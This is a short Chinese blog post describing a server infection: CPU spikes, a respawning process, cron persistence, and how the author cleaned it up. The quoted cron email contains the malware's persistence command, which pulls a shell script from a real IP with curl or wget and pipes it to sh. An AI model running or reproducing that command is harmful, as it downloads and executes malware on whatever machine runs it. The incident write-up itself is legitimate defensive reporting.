肉鸡体验卡

发现服务器CPU异常

PPID为1 kill -9 该进程后又重新恢复了可能起了定时任务

strace分析异常，一直在获取时间

抓包发现可疑IP 可能与邮件相关

发现异常进程名，罪魁祸首

杀死这两个进程后一段时间收到邮件

部分内容如下：

From root@centos.localdomain Thu Jan 16 01:45:01 2020

Return-Path: <root@centos.localdomain>

X-Original-To: root

Delivered-To: root@centos.localdomain

Received: by centos.localdomain (Postfix, from userid 0)

id A729AC0BD1; Thu, 16 Jan 2020 01:45:01 +0800 (CST)

From: "(Cron Daemon)" <root@centos.localdomain>

To: root@centos.localdomain

Subject: Cron <root@centos> (/usr/bin/iojwfaa||/usr/libexec/iojwfaa||/usr/local/bin/iojwfaa||/tmp/iojwfaa||curl -fsSL -m180 http://157.245.59.230:8000/i.sh||wget -q -T180 -O- http://157.245.59.230:8000/i.sh) | sh

Content-Type: text/plain; charset=UTF-8

然后两个病毒进程恢复

发现/var/spool/cron/crontabs /var/spool/cron下均有root脚本，彻底排查删除所有相关的目录下的病毒脚本，杀死进程后终于恢复正常

执行文件iojwfaa

暂时无法反编译获取相关内容

posted @ 2020-01-29 15:13 Mirgo 阅读(235) 评论(0) 编辑收藏举报

刷新页面返回顶部

青青子衿_MI